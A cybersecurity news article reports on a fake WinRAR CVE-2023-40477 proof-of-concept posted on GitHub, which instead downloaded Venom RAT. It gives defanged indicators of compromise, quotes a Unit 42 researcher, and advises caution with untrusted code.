A malicious actor recently released a fake proof-of-concept (PoC) exploit for a WinRAR vulnerability on GitHub. The intention was to infect users who downloaded the code with Venom RAT malware.
This fake PoC was based on a publicly available PoC script that exploited a SQL injection vulnerability in an application called GeoServer. The GeoServer vulnerability is tracked as CVE-2023-25157.
According to Palo Alto Networks Unit 42 researcher Robert Falcone, the threat actors may be targeting not only the research community but also other cybercriminals who may be incorporating the latest vulnerabilities into their own attacks.
The GitHub repository hosted by the user “whalersplonk” is currently inaccessible. The PoC was committed on August 21, 2023, four days after the vulnerability was publicly announced.
The WinRAR vulnerability, tracked as CVE-2023-40477, relates to an improper validation issue in the WinRAR utility that could be exploited to achieve remote code execution (RCE) on Windows systems. The maintainers addressed this vulnerability in version WinRAR 6.23, along with another actively-exploited flaw tracked as CVE-2023-38831.
An analysis of the repository revealed a Python script and a Streamable video demonstrating how to use the exploit. The Python script, instead of running the PoC, connects to a remote server (checkblacklistwords[.]eu) to fetch an executable named Windows.Gaming.Preview.exe, which is a variant of Venom RAT. This executable has capabilities such as listing running processes and receiving commands from a server controlled by the threat actor (94.156.253[.]109).
Further investigation of the attack infrastructure revealed that the threat actor created the checkblacklistwords[.]eu domain at least 10 days prior to the public disclosure of the vulnerability. This indicates that the actor quickly took advantage of the criticality of the bug to attract potential victims.
Palo Alto Networks Unit 42 researcher Robert Falcone stated that an unknown threat actor attempted to compromise individuals by releasing this fake PoC after the vulnerability’s public announcement. The intention was to exploit an RCE vulnerability in WinRAR, a well-known application. However, the PoC is fake and does not actually exploit the WinRAR vulnerability. This suggests that the actor tried to take advantage of the high demand for an RCE in WinRAR to compromise others.
Overall, this incident highlights the need for users to be cautious when downloading code or PoCs from untrusted sources, as threat actors can take advantage of the latest vulnerabilities to distribute malware. It also emphasizes the importance of promptly patching vulnerabilities and keeping software up to date to mitigate the risk of exploitation.
CyberSec84 | Cybersecurity news. 
Leave a comment